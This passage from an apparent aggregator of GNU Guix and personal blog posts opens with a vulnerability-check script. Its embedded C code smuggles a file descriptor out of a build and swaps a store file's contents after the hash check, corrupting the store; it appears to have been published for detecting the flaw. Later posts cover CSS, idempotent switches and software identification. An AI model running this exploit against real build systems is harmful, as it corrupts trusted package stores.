          hdr->cmsg_level = SOL_SOCKET;
          hdr->cmsg_type = SCM_RIGHTS;
          int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640);
          memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));

          msg.msg_controllen = CMSG_SPACE(sizeof(int));

          // Write a single null byte too.
          msg.msg_iov = malloc(sizeof(struct iovec));
          msg.msg_iov[0].iov_base = \"\";
          msg.msg_iov[0].iov_len = 1;
          msg.msg_iovlen = 1;

          // Send it to the othher side of this connection.
          res = sendmsg(sock, &msg, 0);
          if (res < 0) perror(\"sendmsg\");
          int buf;

          // Wait for the server to close the socket, implying that it has
          // received the commmand.
          recv(sock, (void *)&buf, sizeof(int), 0);
      }"))

(define receiver-source
  (mixed-text-file "receiver.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <sys/inotify.h>

      int main(int argc, char **argv) {
          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Bind to the socket.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");
          int res = bind(sock, (const struct sockaddr *)&data,
              offsetof(struct sockaddr_un, sun_path)
              + strlen(\"dihutenosa\")
              + 1);
          if (res < 0) perror(\"bind\");

          res = listen(sock, 1);
          if (res < 0) perror(\"listen\");

          while (1) {
              setvbuf(stdout, NULL, _IOLBF, 0);
              printf(\"accepting connections...\\n\");
              int a = accept(sock, 0, 0);
              if (a < 0) perror(\"accept\");

              struct msghdr msg = {0};
              msg.msg_control = malloc(128);
              msg.msg_controllen = 128;

              // Receive the file descriptor as sent by the smuggler.
              recvmsg(a, &msg, 0);

              struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
              while (hdr) {
                  if (hdr->cmsg_level == SOL_SOCKET
                   && hdr->cmsg_type == SCM_RIGHTS) {
                      int res;

                      // Grab the copy of the file descriptor.
                      memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int));
                      printf(\"preparing our hand...\\n\");

                      ftruncate(res, 0);
                      // Write the expected contents to the file, tricking Nix
                      // into accepting it as matching the fixed-output hash.
                      write(res, \"hello, world\\n\", strlen(\"hello, world\\n\"));

                      // But wait, the file is bigger than this! What could
                      // this code hide?

                      // First, we do a bit of a hack to get a path for the
                      // file descriptor we received. This is necessary because
                      // that file doesn't exist in our mount namespace!
                      char buf[128];
                      sprintf(buf, \"/proc/self/fd/%d\", res);

                      // Hook up an inotify on that file, so whenever Nix
                      // closes the file, we get notified.
                      int inot = inotify_init();
                      inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE);

                      // Notify the smuggler that we've set everything up for
                      // the magic trick we're about to do.
                      close(a);

                      // So, before we continue with this code, a trip into Nix
                      // reveals a small flaw in fixed-output derivations. When
                      // storing their output, Nix has to hash them twice. Once
                      // to verify they match the \"flat\" hash of the derivation
                      // and once more after packing the file into the NAR that
                      // gets sent to a binary cache for others to consume. And
                      // there's a very slight window inbetween, where we could
                      // just swap the contents of our file. But the first hash
                      // is still noted down, and Nix will refuse to import our
                      // NAR file. To trick it, we need to write a reference to
                      // a store path that the source code for the smuggler drv
                      // references, to ensure it gets picked up. Continuing...

                      // Wait for the next inotify event to drop:
                      read(inot, buf, 128);

                      // first read + CA check has just been done, Nix is about
                      // to chown the file to root. afterwards, refscanning
                      // happens...

                      // Empty the file, seek to start.
                      ftruncate(res, 0);
                      lseek(res, 0, SEEK_SET);

                      // We swap out the contents!
                      static const char content[] = \"This file has been corrupted!\\n\";
                      write(res, content, strlen (content));
                      close(res);

                      printf(\"swaptrick finished, now to wait..\\n\");
                      return 0;
                  }

                  hdr = CMSG_NXTHDR(&msg, hdr);
              }
              close(a);
          }
      }"))

(define nonce
  (string-append "-" (number->string (car (gettimeofday)) 16)
                 "-" (number->string (getpid))))

(define original-text
  "This is the original text, before corruption.")

(define derivation-that-exfiltrates-fd
  (computed-file (string-append "derivation-that-exfiltrates-fd" nonce)
                 (with-imported-modules '((guix build utils))
                   #~(begin
                       (use-modules (guix build utils))
                       (invoke #+(compiled-c-code "sender" sender-source))
                       (call-with-output-file #$output
                         (lambda (port)
                           (display #$original-text port)))))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256
                                      (string->utf8 original-text)))))

(define derivation-that-grabs-fd
  (computed-file (string-append "derivation-that-grabs-fd" nonce)
                 #~(begin
                     (open-output-file #$output) ;make sure there's an output
                     (execl #+(compiled-c-code "receiver" receiver-source)
                            "receiver"))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256 #vu8()))))

(define check
  (computed-file "checking-for-vulnerability"
                 #~(begin
                     (use-modules (ice-9 textual-ports))

                     (mkdir #$output)            ;make sure there's an output
                     (format #t "This depends on ~a, which will grab the file
descriptor and corrupt ~a.~%~%"
                             #+derivation-that-grabs-fd
                             #+derivation-that-exfiltrates-fd)

                     (let ((content (call-with-input-file
                                        #+derivation-that-exfiltrates-fd
                                      get-string-all)))
                       (format #t "Here is what we see in ~a: ~s~%~%"
                               #+derivation-that-exfiltrates-fd content)
                       (if (string=? content #$original-text)
                           (format #t "Failed to corrupt ~a, \
your system is safe.~%"
                                   #+derivation-that-exfiltrates-fd)
                           (begin
                             (format #t "We managed to corrupt ~a, \
meaning that YOUR SYSTEM IS VULNERABLE!~%"
                                     #+derivation-that-exfiltrates-fd)
                             (exit 1)))))))

check

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64, and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

by John Kehayias at Tuesday, March 12, 2024

Sunday, March 10, 2024

Idiomdrottning

Re: I used to think CSS was good

ew0k writes:

We now make stylesheets so complicated that we need to write them with a framework that transpiles it down to CSS before shipping? The purpose of stylesheets is to apply consistent styling across semantically distinct content.

I’m not onboard with that perspective. CSS is the appropriate place for presentation complexity.

He goes on:

JavaScript is not bad. It has its purpose, which for example stylesheets are for? No!

JavaScript mangles semantics in a way that CSS does not.

Dynamic content (such as animated elements) and even some amount of user interaction is well handled by CSS to the extent that it more affords designers making pages such that that stuff can be turned off, ignored, overridden. That’s much more difficult with JavaScript and the virtual DOM. A simple wget -qO- |sed 's;";\n;g' |grep mp3$ is not as easily done with a JavaScript-laden page. CSS doesn’t (as often) get in the way of access the page’s content in a broader, more accessible way.

Now, I do think approaches like “object-oriented CSS” are completely misguided, adding an additional layer into something that was already meant to be the glue between layers. But since the cure for that is to allow the CSS layer to be messy and complex, I have sympathy for people making or using things like SASS or Emacs macros. I think that’s good actually. Tools are our friend here. This webpage has just a few lines of CSS but even then I’ve generated those lines using Liquid conditionals so that, for example, pages that don’t have a blockquote don’t style how blockquotes look.

One opposite approach, Tailwind CSS, I’m not fond of either, since it uses a redundant level of classes but it doesn’t harm anyone else, it’s just a cockamamie way to work.

But a good argument against CSS

Really the only “style” I wanna add to the older, pre-style web pages is max-width on the text but that shouldn’t have to be server-side. There should just be a good default, narrower max-width for the body text on older, unstyled web pages. Server-side styling (the font-size tags and friends) was a mistake.

In practice, I’ve been enjoying epub novels, email, text messages, IRC, and Atom/RSS feeds more than web pages for the past several years. 🤷🏻‍♀️

The web is getting ruined by mandatory darkmode, tracking and popups. Popups have been a scourge on the web since time immemorial but for a while we were able to successfully block them. With CSS that’s way harder.

So yes, CSS is bad if plain text is on the menu, which I’d rather choose any day of the week.

Styling and typography are good things! But it should be client side.

by Idiomdrottning (sandra.snan@idiomdrottning.org) at Sunday, March 10, 2024

Thursday, March 7, 2024

Idiomdrottning

Idempotent switches

One lesson I’ve learned in the past few years is that idempotent is good.

That means a switch you push and it stays pushed even if you push more.

For example, piping things through kramdown is idempotent:

echo "Eating only spiders and leaves"|kramdown|kramdown|kramdown

A li’l bit of wasted electricity but text doesn’t get borked.

Used to be I thought toggles were really practical and nifty, and steppers that looped around like a Pacman stage.

But on the Mudita Pure phone, the idempotent menus were a big problem since the screen didn’t work in the dark. I couldn’t orient myself through stepping all the way up.

by Idiomdrottning (sandra.snan@idiomdrottning.org) at Thursday, March 7, 2024

Monday, March 4, 2024

GNU Guix

Identifying software

What does it take to “identify software”? How can we tell what software is running on a machine to determine, for example, what security vulnerabilities might affect it?

In October 2023, the US Cybersecurity and Infrastructure Security Agency (CISA) published a white paper entitled Software Identification Ecosystem Option Analysis that looks at existing options to address these questions. The publication was followed by a request for comments; our comment as Guix developers didn’t make it on time to be published, but we’d like to share it here.

Software identification for cybersecurity purposes is a crucial topic, as the white paper explains in its introduction:

Effective vulnerability management requires software to be trackable in a way that allows correlation with other information such as known vulnerabilities […]. This correlation is only possible when different cybersecurity professionals know they are talking about the same software.

The Common Platform Enumeration (CPE) standard has been designed to fill that role; it is used to identify software as part of the well-known Common Vulnerabilities and Exposures (CVE) process. But CPE is showing its limits as an extrinsic identification mechanism: the human-readable identifiers chosen by CPE fail to capture the complexity of what “software” is.

We think functional software deployment as implemented by Nix and Guix, coupled with the source code identification work carried out by Software Heritage, provides a unique perspective on these matters.

On Software Identification

The Software Identification Ecosystem Option Analysis white paper released by CISA in October 2023 studies options towards the definition of a software identification ecosystem that can be used across the complete, global software space for all key cybersecurity use cases.

Our experience lies in the design and development of GNU Guix, a package manager, software deployment tool, and GNU/Linux distribution, which emphasizes three key elements: reproducibility, provenance tracking, and auditability. We explain in the following sections our approach and how it relates to the goal stated in the aforementioned white paper.

Guix produces binary artifacts of varying complexity from source code: package binaries, application bundles (container images to be consumed by Docker and related tools), system installations, system bundles (container and virtual machine images).

All these artifacts qualify as “software” and so does source code. Some of this “software” comes from well-identified upstream packages, sometimes with modifications added downstream by packagers (patches); binary artifacts themselves are the byproduct of a build process where the package manager uses other binary artifacts it previously built (compilers, libraries, etc.) along with more source code (the package definition) to build them. How can one identify “software” in that sense?

Software is dual: it exists in source form and in binary, machine-executable form. The latter is the outcome of a complex computational process taking source code and intermediary binaries as input.

Our thesis can be summarized as follows:

We consider that the requirements for source code identifiers differ from the requirements to identify binary artifacts.

Our view, embodied in GNU Guix, is that:

  1. Source code can be identified in an unambiguous and distributed fashion through inherent identifiers such as cryptographic hashes.

  2. Binary artifacts, instead, need to be the byproduct of a comprehensive and verifiable build process itself available as source code.

In the next sections, to clarify the context of this statement, we show how Guix identifies source code, how it defines the source-to-binary path and ensures its verifiability, and how it provides provenance tracking.

Source Code Identification

Guix includes package definitions for almost 30,000 packages. Each package definition identifies its origin—its “main” source code as well as patches. The origin is content-addressed: it includes a SHA256 cryptographic hash of the code (an inherent identifier), along with a primary URL to download it.

Since source is content-addressed, the URL can be thought of as a hint. Indeed, we connected Guix to the Software Heritage source code archive: when source code vanishes from its original URL, Guix falls back to downloading it from the archive. This is made possible thanks to the use of inherent (or intrinsic) identifiers both by Guix and Software Heritage.

More information can be found in this 2019 blog post and in the documents of the Software Hash Identifiers (SWHID) working group.

Reproducible Builds

Guix provides a verifiable path from source code to binaries by ensuring reproducible builds. To achieve that, Guix builds upon the pioneering research work of Eelco Dolstra that led to the design of the Nix package manager, with which it shares the same conceptual foundation.

Namely, Guix relies on hermetic builds: builds are performed in isolated environments that contain nothing but explicitly-declared dependencies—where a “dependency” can be the output of another build process or source code, including build scripts and patches.

An implication is that builds can be verified independently. For instance, for a given version of Guix, guix build gcc should produce the exact same binary, bit-for-bit. To facilitate independent verification, guix challenge gcc compares the binary artifacts of the GNU Compiler Collection (GCC) as built and published by different parties. Users can also compare to a local build with guix build gcc --check.

As with Nix, build processes are identified by derivations, which are low-level, content-addressed build instructions; derivations may refer to other derivations and to source code. For instance, /gnu/store/c9fqrmabz5nrm2arqqg4ha8jzmv0kc2f-gcc-11.3.0.drv uniquely identifies the derivation to build a specific variant of version 11.3.0 of the GNU Compiler Collection (GCC). Changing the package definition—patches being applied, build flags, set of dependencies—, or similarly changing one of the packages it depends on, leads to a different derivation (more information can be found in Eelco Dolstra's PhD thesis).

Derivations form a graph that captures the entirety of the build processes leading to a binary artifact. In contrast, mere package name/version pairs such as gcc 11.3.0 fail to capture the breadth and depth elements that lead to a binary artifact. This is a shortcoming of systems such as the Common Platform Enumeration (CPE) standard: it fails to express whether a vulnerability that applies to gcc 11.3.0 applies to it regardless of how it was built, patched, and configured, or whether certain conditions are required.

Full-Source Bootstrap

Reproducible builds alone cannot ensure the source-to-binary correspondence: the compiler could contain a backdoor, as demonstrated by Ken Thompson in Reflections on Trusting Trust. To address that, Guix goes further by implementing so-called full-source bootstrap: for the first time, literally every package in the distribution is built from source code, starting from a very small binary seed. This gives an unprecedented level of transparency, allowing code to be audited at all levels, and improving robustness against the “trusting-trust attack” described by Ken Thompson.

The European Union recognized the importance of this work through an NLnet Privacy & Trust Enhancing Technologies (NGI0 PET) grant allocated in 2021 to Jan Nieuwenhuizen to further work on full-source bootstrap in GNU Guix, GNU Mes, and related projects, followed by another grant in 2022 to expand support to the Arm and RISC-V CPU architectures.

Provenance Tracking

We define provenance tracking as the ability to map a binary artifact back to its complete corresponding source. Provenance tracking is necessary to allow the recipient of a binary artifact to access the corresponding source code and to verify the source/binary correspondence if they wish to do so.

The guix pack command can be used to build, for instance, containers images. Running guix pack -f docker python --save-provenance produces a self-describing Docker image containing the binaries of Python and its run-time dependencies. The image is self-describing because --save-provenance flag leads to the inclusion of a manifest that describes which revision of Guix was used to produce this binary. A third party can retrieve this revision of Guix and from there view the entire build dependency graph of Python, view its source code and any patches that were applied, and recursively for its dependencies.

To summarize, capturing the revision of Guix that was used is all it takes to reproduce a specific binary artifact. This is illustrated by the time-machine command. The example below deploys, at any time on any machine, the specific build artifact of the python package as it was defined in this Guix commit:

guix time-machine -q --commit=d3c3922a8f5d50855165941e19a204d32469006f \
  -- install python

In other words, because Guix itself defines how artifacts are built, the revision of the Guix source coupled with the package name unambiguously identify the package’s binary artifact. As scientists, we build on this property to achieve reproducible research workflows, as explained in this 2022 article in Nature Scientific Data; as engineers, we value this property to analyze the systems we are running and determine which known vulnerabilities and bugs apply.

Again, a software bill of materials (SBOM) written as a mere list of package name/version pairs would fail to capture as much information. The Artifact Dependency Graph (ADG) of OmniBOR, while less ambiguous, falls short in two ways: it is too fine-grained for typical cybersecurity applications (at the level of individual source files), and it only captures the alleged source/binary correspondence of individual files but not the process to go from source to binary.

Conclusions

Inherent identifiers lend themselves well to unambiguous source code identification, as demonstrated by Software Heritage, Guix, and Nix.

However, we believe binary artifacts should instead be treated as the result of a computational process; it is that process that needs to be fully captured to support independent verification of the source/binary correspondence. For cybersecurity purposes, recipients of a binary artifact must be able to be map it back to its source code (provenance tracking), with the additional guarantee that they must be able to reproduce the entire build process to verify the source/binary correspondence (reproducible builds and full-source bootstrap). As long as binary artifacts result from a reproducible build process, itself described as source code, identifying binary artifacts boils down to identifying the source code of their build process.

These ideas are developed in the 2022 scientific paper Building a Secure Software Supply Chain with GNU Guix

by Ludovic Courtès, Maxim Cournoyer, Jan Nieuwenhuizen, Simon Tournier at Monday, March 4, 2024